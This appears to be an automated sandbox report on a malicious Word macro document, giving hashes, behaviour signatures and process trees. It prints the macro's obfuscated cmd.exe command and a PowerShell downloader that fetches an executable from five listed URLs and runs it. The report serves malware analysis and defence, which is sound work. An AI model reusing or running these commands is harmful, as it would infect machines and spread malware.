Analysis
-
max time kernel
119s
-
max time network
120s
-
platform
windows7_x64
-
resource
win7-20240903-en
-
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
-
submitted
08-09-2024 06:51
Behavioral task
behavioral1
Sample
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
-
Size
79KB
-
MD5
d3c91738ad52ede18e7c98de0d688ee4
-
SHA1
b86e74fc6dc8d932006f3c189a743ed020cc0f77
-
SHA256
6dc235b67ec03448dd547ba027bb18ebb7131429138a85b9aaf9dc74933e1683
-
SHA512
f5dff51d938b2585f7b270a441ce23645b70906f566da72b7ea2ff1fad8beb97c257e6582657a6d84f5141172bc929388a19b9cf9c7e2af32b20a1a31226b4c1
-
SSDEEP
1536:vJK+lhLocn1kp59gxBK85fBt+a9pjduedt9+d5paxyN2:vJbla41k/W48jjduedt9+d5paxyQ
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 2572 | 2660 | cmd.exe | WINWORD.EXE
-
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
7 | 2672 | powershell.exe
9 | 2672 | powershell.exe
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
pid | process
2572 | cmd.exe
-
Drops file in Windows directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
2660 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
pid | process
2672 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2672 | powershell.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
2660 | WINWORD.EXE
2660 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
description | pid | process | target process
PID 2660 wrote to memory of 2912 | 2660 | WINWORD.EXE | splwow64.exe
PID 2660 wrote to memory of 2912 | 2660 | WINWORD.EXE | splwow64.exe
PID 2660 wrote to memory of 2912 | 2660 | WINWORD.EXE | splwow64.exe
PID 2660 wrote to memory of 2912 | 2660 | WINWORD.EXE | splwow64.exe
PID 2660 wrote to memory of 2572 | 2660 | WINWORD.EXE | cmd.exe
PID 2660 wrote to memory of 2572 | 2660 | WINWORD.EXE | cmd.exe
PID 2660 wrote to memory of 2572 | 2660 | WINWORD.EXE | cmd.exe
PID 2660 wrote to memory of 2572 | 2660 | WINWORD.EXE | cmd.exe
PID 2572 wrote to memory of 2672 | 2572 | cmd.exe | powershell.exe
PID 2572 wrote to memory of 2672 | 2572 | cmd.exe | powershell.exe
PID 2572 wrote to memory of 2672 | 2572 | cmd.exe | powershell.exe
PID 2572 wrote to memory of 2672 | 2572 | cmd.exe | powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc"
Tree depth: 1
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exe
Command line: C:\Windows\splwow64.exe 12288
Tree depth: 2
-
C:\Windows\SysWOW64\cmd.exe
Command line: cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,^6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"
Tree depth: 2
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}}
Tree depth: 3
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize
19KB
MD5
2c7be22cec7fb9aba52db13ec9fce84f
SHA1
82ba8b5262d8348e0add74ede565e6065401c4d5
SHA256
cf29639e47e72e8674bf7af43ada3e67305d264b5c193d14001b895e0758953a
SHA512
6d2331a6fc7df533c637c7aceac6891e0f4b7363f0124ec2fc5502dee8e3c33e88caddb54392ba9c683c8c597c157c9c4b0e5fa0972aa9f3384e9b021e6010c8
-
memory/2660-7-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-8-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-5-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-10-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-4-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-11-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-2-0x000000007140D000-0x0000000071418000-memory.dmp
Filesize
44KB
-
memory/2660-0-0x000000002F711000-0x000000002F712000-memory.dmp
Filesize
4KB
-
memory/2660-9-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-6-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-15-0x000000007140D000-0x0000000071418000-memory.dmp
Filesize
44KB
-
memory/2660-16-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-17-0x00000000004E0000-0x00000000005E0000-memory.dmp
Filesize
1024KB
-
memory/2660-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
Filesize
64KB
-
memory/2660-37-0x000000005FFF0000-0x0000000060000000-memory.dmp
Filesize
64KB
-
memory/2660-38-0x000000007140D000-0x0000000071418000-memory.dmp
Filesize
44KB